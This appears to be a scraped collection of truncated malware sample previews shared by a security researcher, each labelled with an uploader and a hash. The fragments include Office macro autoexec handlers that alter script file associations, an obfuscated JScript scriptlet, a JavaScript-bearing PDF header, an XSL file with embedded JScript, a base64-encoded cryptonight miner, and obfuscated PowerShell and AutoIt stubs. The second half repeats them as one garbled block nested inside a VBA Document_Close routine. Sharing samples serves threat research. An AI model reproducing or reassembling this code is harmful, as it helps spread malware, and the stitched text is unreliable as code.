John Lambert JohnLaTwC

## FileAssocSet
Sub AutoOpen()
    Call FileTypeSet
End Sub
Sub AutoClose()
    Call FileTypeReset
End Sub
Sub FileTypeReset()
    Dim g_szAsocArray: g_szAsocArray = Array("JSEFile", "JSFile", "VBEFile", "VBSFile", "WSHFile", "WSFFile")
    Dim oWSH
    Dim szExt

## Daily Scriptlet Decoded
## uploaded by @JohnLaTwC
## sample hash: 50685a379e6bd8f24956170ee1bb0b6a86c37db2112946c208d71f4a76a6ec3f
<!--774E5519EACB8982F86034AD06816217FDA1E5D3AFDE3E94BB5B69C95C34F71B1113CC4A1B2E97F458FD598F9682E44DA63A8C98F32C9A43AF4F9452110B4207--><package >
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHA

## PDF JS threat
## Uploaded by @JohnLaTwC
## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc

%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R

## 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
## uploaded by @JohnLaTwC
## sample hash: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f

olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
===============================================================================
FILE: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
Type: OLE

## script.xsl
## uploaded by @JohnLaTwC
## Sample hash: d6fdeac5bced885c470660f09a0da8ea7a7660b5b8542ad487b56976e88fa733

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<msxsl:script language="JScript" implements-prefix="user">

## cryptonight.js
## Uploaded by @JohnLaTwC
## Sample hash: bd0984491d0c6b11162ddcec58bd660f0e779c8b399f153d160bb02fa72aadbc

var a='dmFyIE1vZHVsZT17bG9jYXRlRmlsZTooZnVuY3Rpb24ocGF0aCl7cmV0dXJuIHBhdGh9KX07dmFyIE1vZHVsZTtpZighTW9kdWxlKU1vZHVsZT0odHlwZW9mIE1vZHVsZSE9PSJ1bmRlZmluZWQiP01vZHVsZTpudWxsKXx8e307dmFyIG1vZHVsZU92ZXJyaWRlcz17fTtmb3IodmFyIGtleSBpbiBNb2R1bGUpe2lmKE1vZHVsZS5oYXNPd25Qcm9wZXJ0eShrZXkpKXttb2R1bGVPdmVycmlkZXNba2V5XT1Nb2R1bGVba2V5XX19CnZhciBFTlZJUk9OTUVOVF9JU19XRUI9ITE7dmFyIEVOVklST05NRU5UX0lTX1dPUktFUj0hMTt2YXIgRU5WSVJPTk1FTlRfSVNfTk9ERT0hMTt2YXIgRU5WSVJPTk1FTlRfSVNfU0hFTEw9ITE7aWYoTW9kdWxlLkVOVklST05NRU5UKXtpZihNb2R1bGUuRU5WSVJPTk1FTlQ9PT0iV0VCIil7RU5WSVJPTk1FTlRfSVNfV0VCPSEwfWVsc2UgaWYoTW9kdWxlLkVOVklST05NRU5UPT09IldPUktFUiIpe0VOVklST05NRU5UX0lTX1dPUktFUj0hMH1lbHNlIGlmKE1vZHVsZS5FTlZJUk9OTUVOVD09PSJOT0RFIil7RU5WSVJPTk1FTlRfSVNfTk9ERT0hMH1lbHNlIGlmKE1vZHVsZS5FTlZJUk9OTUVOVD09PSJTSEVMTCIpe0VOVklST05NRU5UX0lTX1NIRUxMPSEwfWVsc2V7dGhyb3cgbmV3IEVycm9yKCJUaGUgcHJvdmlkZWQgTW9kdWxlW1wnRU5WSVJPTk1FTlRcJ10gdmFsdWUgaXMgb

## 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75.txt
## uploaded by @JohnLaTwC
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
===============================================================================
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
Type: OLE
-------------------------------------------------------------------------------

## Brazil PS1 threat
## uploaded by @JohnLaTwC
## sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c

function _/=\_____/==\/=\/\
{
  try
  {
    ${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
    ${/=====\_/\/\_/\_/} = ""
    For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)

## YQYgT.au3
#NoTrayIcon
#EndRegion
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT"
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0")
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"

## b1a337b763c4df875726274632e675bdba4941504b249e6732d7a6dbaeedc235
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Close()
	Sub AutoOpen()
	Call FileTypeSet
	End Sub
	Sub AutoClose()
	Call FileTypeReset
	End Sub
	Sub FileTypeReset()
	Dim g_szAsocArray: g_szAsocArray = Array("JSEFile", "JSFile", "VBEFile", "VBSFile", "WSHFile", "WSFFile")
	Dim oWSH
	Dim szExt
	## uploaded by @JohnLaTwC
	## sample hash: 50685a379e6bd8f24956170ee1bb0b6a86c37db2112946c208d71f4a76a6ec3f
	<!--774E5519EACB8982F86034AD06816217FDA1E5D3AFDE3E94BB5B69C95C34F71B1113CC4A1B2E97F458FD598F9682E44DA63A8C98F32C9A43AF4F9452110B4207--><package >
	<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
	<registration
	progid="obLrn.U3rY5s"
	classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
	<script language="JScript" >
	function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHA
	## Uploaded by @JohnLaTwC
	## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc

	%PDF-1.1

	1 0 obj
	<<
	/Type /Catalog
	/Outlines 2 0 R
	/Pages 3 0 R
	## uploaded by @JohnLaTwC
	## sample hash: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f

	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
	===============================================================================
	FILE: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
	Type: OLE
	## uploaded by @JohnLaTwC
	## Sample hash: d6fdeac5bced885c470660f09a0da8ea7a7660b5b8542ad487b56976e88fa733

	<?xml version='1.0'?>
	<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:user="http://mycompany.com/mynamespace">

	<msxsl:script language="JScript" implements-prefix="user">
	## Uploaded by @JohnLaTwC
	## Sample hash: bd0984491d0c6b11162ddcec58bd660f0e779c8b399f153d160bb02fa72aadbc

	var a='dmFyIE1vZHVsZT17bG9jYXRlRmlsZTooZnVuY3Rpb24ocGF0aCl7cmV0dXJuIHBhdGh9KX07dmFyIE1vZHVsZTtpZighTW9kdWxlKU1vZHVsZT0odHlwZW9mIE1vZHVsZSE9PSJ1bmRlZmluZWQiP01vZHVsZTpudWxsKXx8e307dmFyIG1vZHVsZU92ZXJyaWRlcz17fTtmb3IodmFyIGtleSBpbiBNb2R1bGUpe2lmKE1vZHVsZS5oYXNPd25Qcm9wZXJ0eShrZXkpKXttb2R1bGVPdmVycmlkZXNba2V5XT1Nb2R1bGVba2V5XX19CnZhciBFTlZJUk9OTUVOVF9JU19XRUI9ITE7dmFyIEVOVklST05NRU5UX0lTX1dPUktFUj0hMTt2YXIgRU5WSVJPTk1FTlRfSVNfTk9ERT0hMTt2YXIgRU5WSVJPTk1FTlRfSVNfU0hFTEw9ITE7aWYoTW9kdWxlLkVOVklST05NRU5UKXtpZihNb2R1bGUuRU5WSVJPTk1FTlQ9PT0iV0VCIil7RU5WSVJPTk1FTlRfSVNfV0VCPSEwfWVsc2UgaWYoTW9kdWxlLkVOVklST05NRU5UPT09IldPUktFUiIpe0VOVklST05NRU5UX0lTX1dPUktFUj0hMH1lbHNlIGlmKE1vZHVsZS5FTlZJUk9OTUVOVD09PSJOT0RFIil7RU5WSVJPTk1FTlRfSVNfTk9ERT0hMH1lbHNlIGlmKE1vZHVsZS5FTlZJUk9OTUVOVD09PSJTSEVMTCIpe0VOVklST05NRU5UX0lTX1NIRUxMPSEwfWVsc2V7dGhyb3cgbmV3IEVycm9yKCJUaGUgcHJvdmlkZWQgTW9kdWxlW1wnRU5WSVJPTk1FTlRcJ10gdmFsdWUgaXMgb
	## uploaded by @JohnLaTwC
	## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
	===============================================================================
	FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
	Type: OLE
	-------------------------------------------------------------------------------
	## uploaded by @JohnLaTwC
	## sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c

	function _/=\_____/==\/=\/\
	{
	try
	{
	${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
	${/=====\_/\/\_/\_/} = ""
	For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)
	#NoTrayIcon
	#EndRegion
	Dim $IIThbVLLWS = "1"
	Dim $CWBFTZBdRBF = "YQYg"
	Dim $CWBFTZBdRBFN = "YQYgT"
	Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
	Dim $bBOiAYNfPdZMWb = "BFfLbS"
	Dim $bBOiAYNfPdZMWbP = Int("0")
	Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
	Dim $iECUAbJPJJTThfEIU = "0"
	Attribute VB_Name = "ThisDocument"
	Attribute VB_Base = "1Normal.ThisDocument"
	Attribute VB_GlobalNameSpace = False
	Attribute VB_Creatable = False
	Attribute VB_PredeclaredId = True
	Attribute VB_Exposed = True
	Attribute VB_TemplateDerived = True
	Attribute VB_Customizable = True

	Private Sub Document_Close()